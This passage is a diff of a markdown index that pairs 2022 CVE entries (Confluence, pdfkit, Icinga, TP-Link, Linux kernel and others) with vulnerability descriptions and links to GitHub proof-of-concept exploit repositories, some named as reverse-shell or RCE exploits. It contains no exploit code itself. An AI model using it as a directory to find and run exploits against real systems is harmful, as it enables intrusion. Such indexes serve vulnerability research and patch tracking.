[0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637) +- [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637) + ### CVE-2022-24644 (2022-03-07) ZZ Inc. KeyMouse Windows 3.08 and prior is affected by a remote code execution vulnerability during an unauthenticated update. To exploit this vulnerability, a user must trigger an update of an affected installation of KeyMouse. @@ -764,6 +19062,13 @@ - [gerr-re/cve-2022-24644](https://github.com/gerr-re/cve-2022-24644) - [ThanhThuy2908/ATHDH_CVE_2022_24644](https://github.com/ThanhThuy2908/ATHDH_CVE_2022_24644) +### CVE-2022-24654 (2022-08-15) + +Authenticated stored cross-site scripting (XSS) vulnerability in "Field Server Address" field in INTELBRAS ATA 200 Firmware 74.19.10.21 allows attackers to inject JavaScript code through a crafted payload. + + +- [leonardobg/CVE-2022-24654](https://github.com/leonardobg/CVE-2022-24654) + ### CVE-2022-24675 (2022-04-20) encoding/pem in Go before 1.17.9 and 1.18.x before 1.18.1 has a Decode stack overflow via a large amount of PEM data. @@ -778,6 +19083,13 @@ - [lukejenkins/CVE-2022-24693](https://github.com/lukejenkins/CVE-2022-24693) +### CVE-2022-24702 (2022-05-31) + +An issue was discovered in WinAPRS 2.9.0. A buffer overflow in the VHF KISS TNC component allows a remote attacker to achieve remote code execution via malicious AX.25 packets over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer + + +- [Coalfire-Research/WinAPRS-Exploits](https://github.com/Coalfire-Research/WinAPRS-Exploits) + ### CVE-2022-24706 (2022-04-26) In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations. @@ -785,6 +19097,7 @@ - [sadshade/CVE-2022-24706-CouchDB-Exploit](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit) - [ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-](https://github.com/ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-) +- [superzerosec/CVE-2022-24706](https://github.com/superzerosec/CVE-2022-24706) ### CVE-2022-24707 (2022-02-23) @@ -800,6 +19113,26 @@ - [ItzSwirlz/CVE-2022-24713-POC](https://github.com/ItzSwirlz/CVE-2022-24713-POC) +### CVE-2022-24715 (2022-03-08) + +Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration. + + +- [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715) +- [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715) +- [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go) + +### CVE-2022-24716 (2022-03-08) + +Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. + + +- [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716) +- [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716) +- [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716) +- [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716) +- [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716) + ### CVE-2022-24734 (2022-03-09) MyBB is a free and open source forum software. In affected versions the Admin CP's Settings management module does not validate setting types correctly on insertion and update, making it possible to add settings of supported type `php` with PHP code, executed on on _Change Settings_ pages. This results in a Remote Code Execution (RCE) vulnerability. The vulnerable module requires Admin CP access with the `Can manage settings?` permission. MyBB's Settings module, which allows administrators to add, edit, and delete non-default settings, stores setting data in an options code string ($options_code; mybb_settings.optionscode database column) that identifies the setting type and its options, separated by a new line character (\n). In MyBB 1.2.0, support for setting type php was added, for which the remaining part of the options code is PHP code executed on Change Settings pages (reserved for plugins and internal use). MyBB 1.8.30 resolves this issue. There are no known workarounds. @@ -808,6 +19141,35 @@ - [Altelus1/CVE-2022-24734](https://github.com/Altelus1/CVE-2022-24734) - [lavclash75/mybb-CVE-2022-24734](https://github.com/lavclash75/mybb-CVE-2022-24734) +### CVE-2022-24760 (2022-03-11) + +Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm. + + +- [tuo4n8/CVE-2022-24760](https://github.com/tuo4n8/CVE-2022-24760) + +### CVE-2022-24780 (2022-04-05) + +Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds. + + +- [Acceis/exploit-CVE-2022-24780](https://github.com/Acceis/exploit-CVE-2022-24780) + +### CVE-2022-24818 (2022-04-13) + +GeoTools is an open source Java library that provides tools for geospatial data. The GeoTools library has a number of data sources that can perform unchecked JNDI lookups, which in turn can be used to perform class deserialization and result in arbitrary code execution. Similar to the Log4J case, the vulnerability can be triggered if the JNDI names are user-provided, but requires admin-level login to be triggered. The lookups are now restricted in GeoTools 26.4, GeoTools 25.6, and GeoTools 24.6. Users unable to upgrade should ensure that any downstream application should not allow usage of remotely provided JNDI strings. + + +- [mbadanoiu/CVE-2022-24818](https://github.com/mbadanoiu/CVE-2022-24818) + +### CVE-2022-24834 (2023-07-13) + +Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20. + + +- [convisolabs/CVE-2022-24834](https://github.com/convisolabs/CVE-2022-24834) +- [DukeSec97/CVE-2022-24834-](https://github.com/DukeSec97/CVE-2022-24834-) + ### CVE-2022-24853 (2022-04-14) Metabase is an open source business intelligence and analytics application. Metabase has a proxy to load arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return contents of arbitrary URLs, there is a case where a particularly crafted request could result in file access on windows, which allows enabling an `NTLM relay attack`, potentially allowing an attacker to receive the system password hash. If you use Windows and are on this version of Metabase, please upgrade immediately. The following patches (or greater versions) are available: 0.42.4 and 1.42.4, 0.41.7 and 1.41.7, 0.40.8 and 1.40.8. @@ -827,6 +19189,8 @@ wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry. +- [nanaao/CVE-2022-24934](https://github.com/nanaao/CVE-2022-24934) +- [ASkyeye/WPS-CVE-2022-24934](https://github.com/ASkyeye/WPS-CVE-2022-24934) - [webraybtl/CVE-2022-24934](https://github.com/webraybtl/CVE-2022-24934) - [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934) @@ -835,8 +19199,19 @@ TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response. +- [Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-](https://github.com/Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-) +- [VVeakee/CVE-2022-24990-POC](https://github.com/VVeakee/CVE-2022-24990-POC) - [0xf4n9x/CVE-2022-24990](https://github.com/0xf4n9x/CVE-2022-24990) +- [lishang520/CVE-2022-24990](https://github.com/lishang520/CVE-2022-24990) - [ZZ-SOCMAP/CVE-2022-24990](https://github.com/ZZ-SOCMAP/CVE-2022-24990) +- [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990) + +### CVE-2022-24992 (2022-07-25) + +A vulnerability in the component process.php of QR Code Generator v5.2.7 allows attackers to perform directory traversal. + + +- [n0lsecurity/CVE-2022-24992](https://github.com/n0lsecurity/CVE-2022-24992) ### CVE-2022-24999 (2022-11-26) @@ -845,6 +19220,66 @@ - [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999) +### CVE-2022-25012 (2022-03-01) + +Argus Surveillance DVR v4.0 employs weak password encryption. + + +- [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012) + +### CVE-2022-25018 (2022-03-01) + +Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages. + + +- [MoritzHuppert/CVE-2022-25018](https://github.com/MoritzHuppert/CVE-2022-25018) + +### CVE-2022-25020 (2022-03-01) + +A cross-site scripting (XSS) vulnerability in Pluxml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the thumbnail path of a blog post. + + +- [MoritzHuppert/CVE-2022-25020](https://github.com/MoritzHuppert/CVE-2022-25020) + +### CVE-2022-25022 (2022-03-01) + +A cross-site scripting (XSS) vulnerability in Htmly v2.8.1 allows attackers to excute arbitrary web scripts HTML via a crafted payload in the content field of a blog post. + + +- [MoritzHuppert/CVE-2022-25022](https://github.com/MoritzHuppert/CVE-2022-25022) + +### CVE-2022-25060 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_startPing. + + +- [exploitwritter/CVE-2022-25060](https://github.com/exploitwritter/CVE-2022-25060) + +### CVE-2022-25061 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_setIp6DefaultRoute. + + +- [exploitwritter/CVE-2022-25061](https://github.com/exploitwritter/CVE-2022-25061) + +### CVE-2022-25062 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain an integer overflow via the function dm_checkString. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. + + +- [exploitwritter/CVE-2022-25062](https://github.com/exploitwritter/CVE-2022-25062) + +### CVE-2022-25063 +- [exploitwritter/CVE-2022-25063](https://github.com/exploitwritter/CVE-2022-25063) + +### CVE-2022-25064 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr. + + +- [exploitwritter/CVE-2022-25064](https://github.com/exploitwritter/CVE-2022-25064) +- [Mr-xn/CVE-2022-25064](https://github.com/Mr-xn/CVE-2022-25064) + ### CVE-2022-25089 (2022-03-02) Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData. @@ -880,6 +19315,24 @@ - [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256) +### CVE-2022-25257 +- [polling-repo-continua/CVE-2022-25257](https://github.com/polling-repo-continua/CVE-2022-25257) +- [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257) + +### CVE-2022-25258 (2022-02-16) + +An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. + + +- [szymonh/d-os-descriptor](https://github.com/szymonh/d-os-descriptor) + +### CVE-2022-25260 (2022-02-25) + +JetBrains Hub before 2021.1.14276 was vulnerable to blind Server-Side Request Forgery (SSRF). + + +- [yuriisanin/CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260) + ### CVE-2022-25262 (2022-02-25) In JetBrains Hub before 2022.1.14434, SAML request takeover was possible. @@ -887,12 +19340,20 @@ - [yuriisanin/CVE-2022-25262](https://github.com/yuriisanin/CVE-2022-25262) +### CVE-2022-25265 (2022-02-16) + +In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file. + + +- [x0reaxeax/exec-prot-bypass](https://github.com/x0reaxeax/exec-prot-bypass) + ### CVE-2022-25313 (2022-02-18) In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element. - [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313) +- [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313) ### CVE-2022-25314 (2022-02-18) @@ -907,21 +19368,99 @@ - [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315) +- [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315) + +### CVE-2022-25365 (2022-02-19) + +Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774. + + +- [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365) + +### CVE-2022-25375 (2022-02-20) + +An issue was discovered in drivers/usb/gadget/function/rndis.c in the Linux kernel before 5.16.10. The RNDIS USB gadget lacks validation of the size of the RNDIS_MSG_SET command. Attackers can obtain sensitive information from kernel memory. + + +- [szymonh/rndis-co](https://github.com/szymonh/rndis-co) + +### CVE-2022-25479 (2024-07-02) + +Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 allows for the leakage of kernel memory from both the stack and the heap. + + +- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN) ### CVE-2022-25636 (2022-02-22) net/netfilter/nf_dup_netdev.c in the Linux kernel 5.4 through 5.6.10 allows local users to gain privileges because of a heap out-of-bounds write. This is related to nf_tables_offload. +- [Bonfee/CVE-2022-25636](https://github.com/Bonfee/CVE-2022-25636) +- [chenaotian/CVE-2022-25636](https://github.com/chenaotian/CVE-2022-25636) - [veritas501/CVE-2022-25636-PipeVersion](https://github.com/veritas501/CVE-2022-25636-PipeVersion) +### CVE-2022-25640 (2022-02-24) + +In wolfSSL before 5.2.0, a TLS 1.3 server cannot properly enforce a requirement for mutual authentication. A client can simply omit the certificate_verify message from the handshake, and never present a certificate. + + +- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit) + +### CVE-2022-25765 (2022-09-09) + +The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. + + +- [PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell](https://github.com/PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell) +- [Wai-Yan-Kyaw/PDFKitExploit](https://github.com/Wai-Yan-Kyaw/PDFKitExploit) +- [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765) +- [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection) +- [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765) +- [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765) +- [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection) +- [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765) + +### CVE-2022-25813 (2022-09-02) + +In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin, can insert a malicious content in a message “Subject” field from the "Contact us" page. Then a party manager needs to list the communications in the party component to activate the SSTI. A RCE is then possible. + + +- [mbadanoiu/CVE-2022-25813](https://github.com/mbadanoiu/CVE-2022-25813) + +### CVE-2022-25845 (2022-06-10) + +The package com.alibaba:fastjson before 1.2.83 are vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode). + + +- [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns) +- [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit) +- [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1) +- [luelueking/CVE-2022-25845-In-Spring](https://github.com/luelueking/CVE-2022-25845-In-Spring) +- [ph0ebus/CVE-2022-25845-In-Spring](https://github.com/ph0ebus/CVE-2022-25845-In-Spring) + +### CVE-2022-25927 (2023-01-25) + +Versions of the package ua-parser-js from 0.7.30 and before 0.7.33, from 0.8.1 and before 1.0.33 are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim() function.\r\r + + +- [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927) + ### CVE-2022-25943 (2022-03-09) The installer of WPS Office for Windows versions prior to v11.2.0.10258 fails to configure properly the ACL for the directory where the service program is installed. +- [HadiMed/KINGSOFT-WPS-Office-LPE](https://github.com/HadiMed/KINGSOFT-WPS-Office-LPE) - [webraybtl/CVE-2022-25943](https://github.com/webraybtl/CVE-2022-25943) +### CVE-2022-25949 (2022-03-17) + +The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. + + +- [tandasat/CVE-2022-25949](https://github.com/tandasat/CVE-2022-25949) + ### CVE-2022-26133 (2022-04-20) SharedSecretClusterAuthenticator in Atlassian Bitbucket Data Center versions 5.14.0 and later before 7.6.14, 7.7.0 and later prior to 7.17.6, 7.18.0 and later prior to 7.18.4, 7.19.0 and later prior to 7.19.4, and 7.20.0 allow a remote, unauthenticated attacker to execute arbitrary code via Java deserialization. @@ -969,6 +19508,39 @@ - [kh4sh3i/CVE-2022-26134](https://github.com/kh4sh3i/CVE-2022-26134) - [ColdFusionX/CVE-2022-26134](https://github.com/ColdFusionX/CVE-2022-26134) - [Luchoane/CVE-2022-26134_conFLU](https://github.com/Luchoane/CVE-2022-26134_conFLU) +- [r1skkam/TryHackMe-Atlassian-CVE-2022-26134](https://github.com/r1skkam/TryHackMe-Atlassian-CVE-2022-26134) +- [nxtexploit/CVE-2022-26134](https://github.com/nxtexploit/CVE-2022-26134) +- [Debajyoti0-0/CVE-2022-26134](https://github.com/Debajyoti0-0/CVE-2022-26134) +- [f4yd4-s3c/cve-2022-26134](https://github.com/f4yd4-s3c/cve-2022-26134) +- [coskper-papa/CVE-2022-26134](https://github.com/coskper-papa/CVE-2022-26134) +- [p4b3l1t0/confusploit](https://github.com/p4b3l1t0/confusploit) +- [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC) +- [iveresk/cve-2022-26134](https://github.com/iveresk/cve-2022-26134) +- [keven1z/CVE-2022-26134](https://github.com/keven1z/CVE-2022-26134) +- [shiftsansan/CVE-2022-26134-Console](https://github.com/shiftsansan/CVE-2022-26134-Console) +- [1337in/CVE-2022-26134web](https://github.com/1337in/CVE-2022-26134web) +- [skhalsa-sigsci/CVE-2022-26134-LAB](https://github.com/skhalsa-sigsci/CVE-2022-26134-LAB) +- [yigexioabai/CVE-2022-26134-cve1](https://github.com/yigexioabai/CVE-2022-26134-cve1) +- [kailing0220/CVE-2022-26134](https://github.com/kailing0220/CVE-2022-26134) +- [xanszZZ/ATLASSIAN-Confluence_rce](https://github.com/xanszZZ/ATLASSIAN-Confluence_rce) +- [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134) +- [CJ-0107/cve-2022-26134](https://github.com/CJ-0107/cve-2022-26134) +- [latings/CVE-2022-26134](https://github.com/latings/CVE-2022-26134) +- [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134) +- [b4dboy17/CVE-2022-26134](https://github.com/b4dboy17/CVE-2022-26134) +- [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134) +- [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check) +- [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell) +- [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134) +- [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134) +- [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134) +- [DARKSTUFF-LAB/-CVE-2022-26134](https://github.com/DARKSTUFF-LAB/-CVE-2022-26134) +- [404fu/CVE-2022-26134-POC](https://github.com/404fu/CVE-2022-26134-POC) +- [xsxtw/CVE-2022-26134](https://github.com/xsxtw/CVE-2022-26134) +- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) +- [cc3305/CVE-2022-26134](https://github.com/cc3305/CVE-2022-26134) +- [Agentgilspy/CVE-2022-26134](https://github.com/Agentgilspy/CVE-2022-26134) +- [XiaomingX/cve-2022-26134-poc](https://github.com/XiaomingX/cve-2022-26134-poc) ### CVE-2022-26135 (2022-06-30) @@ -976,6 +19548,17 @@ - [assetnote/jira-mobile-ssrf-exploit](https://github.com/assetnote/jira-mobile-ssrf-exploit) +- [safe3s/CVE-2022-26135](https://github.com/safe3s/CVE-2022-26135) + +### CVE-2022-26138 (2022-07-20) + +The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app. + + +- [alcaparra/CVE-2022-26138](https://github.com/alcaparra/CVE-2022-26138) +- [Vulnmachines/Confluence-Question-CVE-2022-26138-](https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-) +- [z92g/CVE-2022-26138](https://github.com/z92g/CVE-2022-26138) +- [shavchen/CVE-2022-26138](https://github.com/shavchen/CVE-2022-26138) ### CVE-2022-26159 (2022-02-28) @@ -984,6 +19567,14 @@ - [p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML](https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML) +### CVE-2022-26265 (2022-03-18) + +Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. + + +- [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265) +- [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265) + ### CVE-2022-26269 (2022-03-29) Suzuki Connect v1.0.15 allows attackers to tamper with displayed messages via spoofed CAN messages. @@ -996,8 +19587,46 @@ On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. +- [misterxid/watchguard_cve-2022-26318](https://github.com/misterxid/watchguard_cve-2022-26318) - [h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318) - [BabyTeam1024/CVE-2022-26318](https://github.com/BabyTeam1024/CVE-2022-26318) +- [egilas/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/egilas/Watchguard-RCE-POC-CVE-2022-26318) + +### CVE-2022-26377 (2022-06-08) + +Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions. + + +- [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc) + +### CVE-2022-26485 (2022-12-22) + +Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0. + + +- [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485) + +### CVE-2022-26488 (2022-03-07) + +In Python before 3.10.3 on Windows, local users can gain privileges because the search path is inadequately secured. The installer may allow a local attacker to add user-writable directories to the system search path. To exploit, an administrator must have installed Python for all users and enabled PATH entries. A non-administrative user can trigger a repair that incorrectly adds user-writable paths into PATH, enabling search-path hijacking of other users and system services. This affects Python (CPython) through 3.7.12, 3.8.x through 3.8.12, 3.9.x through 3.9.10, and 3.10.x through 3.10.2. + + +- [techspence/PyPATHPwner](https://github.com/techspence/PyPATHPwner) + +### CVE-2022-26503 (2022-03-17) + +Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges. + + +- [sinsinology/CVE-2022-26503](https://github.com/sinsinology/CVE-2022-26503) + +### CVE-2022-26629 (2022-03-24) + +An Access Control vulnerability exists in SoroushPlus+ Messenger 1.0.30 in the Lock Screen Security Feature function due to insufficient permissions and privileges, which allows a malicious attacker bypass the lock screen function. + + +- [scopion/CVE-2022-26629](https://github.com/scopion/CVE-2022-26629) +- [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629) ### CVE-2022-26717 (2022-11-01) @@ -1021,6 +19650,20 @@ - [Dylbin/flow_divert](https://github.com/Dylbin/flow_divert) +### CVE-2022-26763 (2022-05-26) + +An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious application may be able to execute arbitrary code with system privileges. + + +- [zhuowei/PCICrash](https://github.com/zhuowei/PCICrash) + +### CVE-2022-26766 (2022-05-26) + +A certificate parsing issue was addressed with improved checks. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious app may be able to bypass signature validation. + + +- [zhuowei/CoreTrustDemo](https://github.com/zhuowei/CoreTrustDemo) + ### CVE-2022-26809 (2022-04-15) Remote Procedure Call Runtime Remote Code Execution Vulnerability @@ -1034,6 +19677,8 @@ - [oppongjohn/CVE-2022-26809-RCE](https://github.com/oppongjohn/CVE-2022-26809-RCE) - [yuanLink/CVE-2022-26809](https://github.com/yuanLink/CVE-2022-26809) - [s1ckb017/PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809) +- [fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp](https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp) +- [michealadams30/Cve-2022-26809](https://github.com/michealadams30/Cve-2022-26809) ### CVE-2022-26923 (2022-05-10) @@ -1042,6 +19687,10 @@ - [r1skkam/TryHackMe-CVE-2022-26923](https://github.com/r1skkam/TryHackMe-CVE-2022-26923) - [LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services) +- [lsecqt/CVE-2022-26923-Powershell-POC](https://github.com/lsecqt/CVE-2022-26923-Powershell-POC) +- [evilashz/PIGADVulnScanner](https://github.com/evilashz/PIGADVulnScanner) +- [Gh-Badr/CVE-2022-26923](https://github.com/Gh-Badr/CVE-2022-26923) +- [Yowise/CVE-2022-26923](https://github.com/Yowise/CVE-2022-26923) ### CVE-2022-26927 (2022-05-10) @@ -1057,6 +19706,14 @@ - [corelight/CVE-2022-26937](https://github.com/corelight/CVE-2022-26937) - [omair2084/CVE-2022-26937](https://github.com/omair2084/CVE-2022-26937) +- [Malwareman007/CVE-2022-26937](https://github.com/Malwareman007/CVE-2022-26937) + +### CVE-2022-26965 (2022-03-18) + +In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. + + +- [SkDevilS/Pluck-Exploitation-by-skdevils](https://github.com/SkDevilS/Pluck-Exploitation-by-skdevils) ### CVE-2022-27134 (2022-05-12) @@ -1065,6 +19722,41 @@ - [Kenun99/CVE-batdappboomx](https://github.com/Kenun99/CVE-batdappboomx) +### CVE-2022-27226 (2022-03-19) + +A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. + + +- [SakuraSamuraii/ez-iRZ](https://github.com/SakuraSamuraii/ez-iRZ) + +### CVE-2022-27251 +- 